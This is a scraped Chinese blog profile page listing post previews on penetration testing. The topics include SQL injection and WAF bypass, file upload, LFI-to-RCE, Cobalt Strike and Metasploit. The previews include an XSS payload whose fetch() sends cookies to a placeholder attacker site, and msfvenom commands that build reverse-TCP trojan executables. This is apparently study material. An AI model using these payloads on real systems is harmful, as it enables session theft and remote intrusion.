自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 收藏
  • 关注

原创 域渗透-备忘录

委派获取的权限在于,委派的用户是谁,被委派什么服务,如果是普通域用户,那就获得普通域用户的票据,如果是域管,那就是域管票据,信息收集可以通过Bloodhuond。例如DC01$委派WIN2016$,那么用win2016的账户进行getST就能获取到DC01的票据了。

2023-03-01 15:02:53 607

原创 PHP-从LFI到RCE(上)

利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfi到rce。...

2022-08-31 10:21:57 1677

原创 web漏洞-文件上传漏洞详解

1.iis解析漏洞,就是利用*.asp;1.jpg的文件名会以asp脚本执行,服务器默认不解析;后面内容还有就是文件夹名字为*.asp *.asa是,里面的文件会以asp脚本执行apache解析漏洞比如test.php.qwe.asd 中 “.qwe”和”.asd” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.qwe.asd解析成php。nginx解析漏洞http://www.xxser.com/1.jpg/1.php 其中1.php为一个不存在的文件,就会去

2022-04-08 19:33:04 346

原创 渗透测试-web到内网的总结

WEB渗透sql注入【存在数据库交互就存在注入,本质就是传参过滤不严格】注入分类:1.post,get,cookie,http头注入2.布尔盲注,时间盲注,报错注入,堆叠注入(;),联合注入(union)报错注入常用函数:1.floor,extractvaule,updatexml,expmysql读取函数:load_file(),into outfile , into dumpfilesql注入bypass常规bypass思路替换:空格可以用/**/,/*!*/,%20,%09,%0

2022-04-08 19:32:00 6832

原创 WEB-漏洞总结(sqlmap的使用和sql过waf)

记:sqlmap的–os-shell原理解析–os-shell的前提1.必须是root权限,也就是dba权限 sqlmap用–is-dba判断,返回true就是dba权限2.知道网站的绝对路径,首先sqlmap会尝试报错去发现绝对路经,如果没发现可以主动选择爆破或者自己输入路径3.关闭gpc转义,因为shell需要上传2个文件。具体sqlmap的攻击流程差不多是这样:测试链接是否能够访问判断操作系统版本传递一个数组,尝试爆绝对路径指定上传路径使用lines term

2022-03-24 23:09:34 1617

原创 WEB-漏洞总结(xss详解)

1.xss的分类反射型,存储型,dom型反射型(url)http://www.xxx.com/music?name='bob'攻击者拼接一个恶意的script请求http://www.xxx.com/music?name='bob'<script>alert(1)</script>甚至可以这样http://www.xxx.com/music?name='bob'<script>fetch(`http://恶意者的网站.com/>cookie=${d

2022-03-24 20:22:46 211

原创 WEB-漏洞总结(sql注入详解)

SQL注入sql注入分类1.post注入,get注入,cookie注入,http头注入(可能user-agent存在注入)2.数字型注入,字符型注入(类似一个int,一个chr)3.盲注:布尔盲注,时间盲注报错注入:利用报错函数,常见报错函数...

2022-03-24 16:18:27 10312

原创 内网渗透-项目六外围打点

1.外围打点1.1拓补图1.2发现主机arp-scan -l可以发现目标ip为192.168.31.138,nmap扫描端口,接下来绑定hosts域名,访问目标网站。nmap -p- -sC -sV -O 192.168.31.138 -oA ip_port注:-p为指定端口,可以先用masscan扫描开发端口,再用nmap。绑定hosts,目标域名是www.webhack123.comvim /etc/hosts直接按照图中添加就可以了。1.3网站目录扫描打开网站发现没有什

2022-03-18 10:35:43 2234 1

原创 内网渗透-(端口复用和隧道建立)

前言:首先对于出网与不出网的区别很多人不理解,内网不出网到底是ping不通百度还是ping不通同一网段的机器。其实大部分内网不出网都是ping不通百度,不能去外网,ping不通同一网段要不是配置错误,要不就是防火墙问题,还有就是不能ping通同一网段的机器上线价值不大,以下我们讨论的不出网都是不能ping通百度的。对于有双网卡的机器,既可以出外网又和内网机器相同我们称这个机器为(DMZ区机器),也就是win7机器,一般也是我们的跳板机。对于这种我们可以直接拿下dmz区域的机器,利用dmz机器跳板进

2022-03-15 09:58:11 3372

原创 靶场搭建-VMware网络配置

1.首先看看网络拓补图注意:这里我们需要搭建是一个三层网络第一层:kali:192.168.1.7d

2022-03-11 20:29:57 2382

原创 渗透测试-完整渗透流程(三.内网转发和内网渗透)

记:上篇我们讲到已经拿到一个网站的webshell,并且拿到了主机的最高权限,然后开始内网渗透【注】:有些人可以不理解网站shell,网站是在一个主机上的,就相当于我们自己的主机,在公网上就是服务器,一个服务器可能有多个网站,所以网站的权限一般都是低权限,就相当于一台电脑有几个用户,但是管理员就一个(其实管理员一个不准确,准确来说一个管理员组,因为在管理员组内的都是管理员)好的,现在拿到了最高权限,win最高权限是system(其实还有一个比system还高的,忘了,实战拿到system就可以了),li

2022-03-08 22:02:53 9992

原创 渗透测试-完整渗透流程(二.漏洞扫描和利用)

【web漏洞探测】1.当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:SQL注入XSS跨站脚本CSRF跨站请求伪造XXE漏洞SSRF服务端请求伪造漏洞文件包含漏洞文件上传漏洞文件解析漏洞远程代码执行漏洞CORS跨域资源共享漏洞越权访问漏洞目录浏览漏洞和任意文件读取/下载漏洞struts2漏洞JAVA反序列化漏洞篇幅有限这些都不赘述了2.使用工具进行探测AWVSNessusAppScanOwasp-Z

2022-03-08 17:49:33 8954

原创 Cobalt Strike-使用备忘录

CS简介:cs的功能和msf相似,但是图形化界面还有不同于msf的复杂命令,这时用cs内网渗透就显得额外轻松1.首先在你的kali里面运行cs的服务端root@kali:cobaltstrike4.0# ./teamserver 192.168.31.120 123456注:192.168.31.120为kali的ip,123456为密码其实在实战当中应该用vps作为服务端,有公网ip就很好渗透了,建议在阿里云申请一个服务器配置cs服务端,记得在防火墙里开放端口2.windows客户端上线运

2022-03-08 17:19:34 439

原创 渗透测试-完整渗透流程(一.信息收集)

信息收集1.信息收集分为主动收集和被动收集,主动收集会被防守方发现,被动收集不会被发现。主动信息收集:通过直接访问、扫描网站,这种流量将流经网站被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索等1.被动收集:Google hacking (谷歌黑语法)site:可以限制你搜索范围的域名.inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.intext: 只搜索网页部分中包含的文字(也就是忽略了标题、URL等的文字)

2022-03-08 17:18:56 15775

原创 MSF-使用备忘录

一.使用msf生成各种类型payload1.生成win的exe木马文件msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f exe >/root/muma.exe2.生成linux的可执行文件msfvenom -p linux/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f elf >/root/muma.elf注:其

2022-03-01 23:15:41 503

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除